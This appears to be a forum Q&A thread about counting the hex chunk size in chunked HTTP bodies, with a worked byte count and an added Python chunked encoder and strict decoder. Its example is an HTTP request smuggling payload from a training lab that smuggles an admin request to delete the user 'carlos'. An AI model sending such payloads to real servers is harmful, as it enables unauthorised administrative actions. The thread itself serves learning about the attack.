0

I don't understand how the size is counted in Transfer-Encoding: chunked. Can anyone explain this chunk size, please? Thank you.

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
4
  • 1
    Your question and example content don't add up. There's no mention of Transfer-encoding: chunked there, not 15 bytes of data... What's that 87 at the start..? Commented Jan 27, 2021 at 7:30
  • Sorry, I just wanted to understand the chunk size, but I edited the post and it has the full request. Commented Jan 28, 2021 at 8:20
  • It still doesn't make sense. You're claiming you're sending 4 bytes of content in your Content-length header, then your chunk header says "here's 87 bytes in this chunk". Commented Jan 28, 2021 at 10:44
  • Have you read the Wikipedia article? en.wikipedia.org/wiki/Chunked_transfer_encoding#Format Commented Jan 28, 2021 at 10:46

1 Answer

1

When studying HTTP request smuggling, I too struggled to work out how the chunk size is counted. I've found the example from Wikipedia to be very helpful (https://en.wikipedia.org/wiki/Chunked_transfer_encoding#Example).

So let me try to help you out here, as this is actually a good exercise for me too.

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The 87 there is in hex form. In decimal form, it's 135. Thus the chunk size is 135 bytes.

Then, for every line below 87, we count every character (assuming 1 character equals 1 byte) and then add 2 bytes for the CRLF (\r\n), except for the last line above 0, whose trailing CRLF we don't need to count.

Thus it goes something like this:

GET /admin/delete?username=carlos HTTP/1.1 -> 42 + 2 bytes for \r\n = 44 bytes
Host: localhost -> 15 + 2 = 17 bytes
Content-Type: application/x-www-form-urlencoded -> 47 + 2 = 49 bytes
Content-Length: 15 -> 18 + 2 = 20 bytes
 -> 0 + 2 = 2 bytes
x=1 -> 3 bytes

Thus in total there are 135 bytes of chunked data.

Hope this could help.
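Added example, not part of the original answer: the same count done in Python, with a strict decoder that checks each declared hex size against the bytes that follow it. The names `CHUNK_DATA`, `encode_chunked` and `decode_chunked` are made up for this illustration, and the sample assumes CRLF line endings and one byte per character, as the answer does.

```python
CRLF = b"\r\n"
HEX = b"0123456789abcdefABCDEF"

# Constructed sample: the chunk data from the question, lines joined with CRLF.
# No CRLF after "x=1": the CRLF that follows it on the wire ends the chunk
# and is not counted in the chunk size.
CHUNK_DATA = CRLF.join([
    b"GET /admin/delete?username=carlos HTTP/1.1",
    b"Host: localhost",
    b"Content-Type: application/x-www-form-urlencoded",
    b"Content-Length: 15",
    b"",
    b"x=1",
])

def encode_chunked(*chunks):
    """Frame each chunk as <hex size> CRLF <data> CRLF, then the final 0 chunk."""
    framed = b"".join(b"%x" % len(c) + CRLF + c + CRLF for c in chunks)
    return framed + b"0" + CRLF + CRLF

def decode_chunked(body):
    """Strict decoder: raise ValueError unless every size matches its data."""
    chunks, pos = [], 0
    while True:
        eol = body.find(CRLF, pos)
        if eol < 0:
            raise ValueError("chunk-size line is not terminated by CRLF")
        size_field = body[pos:eol].split(b";", 1)[0]  # ignore chunk extensions
        if not size_field or any(c not in HEX for c in size_field):
            raise ValueError("chunk size is not plain hex: %r" % size_field)
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            return chunks  # trailer fields, if any, are not parsed here
        data = body[pos:pos + size]
        if len(data) != size or body[pos + size:pos + size + 2] != CRLF:
            raise ValueError("declared size %d does not match chunk data" % size)
        chunks.append(data)
        pos += size + 2

if __name__ == "__main__":
    print(len(CHUNK_DATA), encode_chunked(CHUNK_DATA)[:4])
```

If the same lines are saved with bare LF endings, the data is 5 bytes shorter (130, hex 82), which is the usual reason a hand-computed size does not match.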
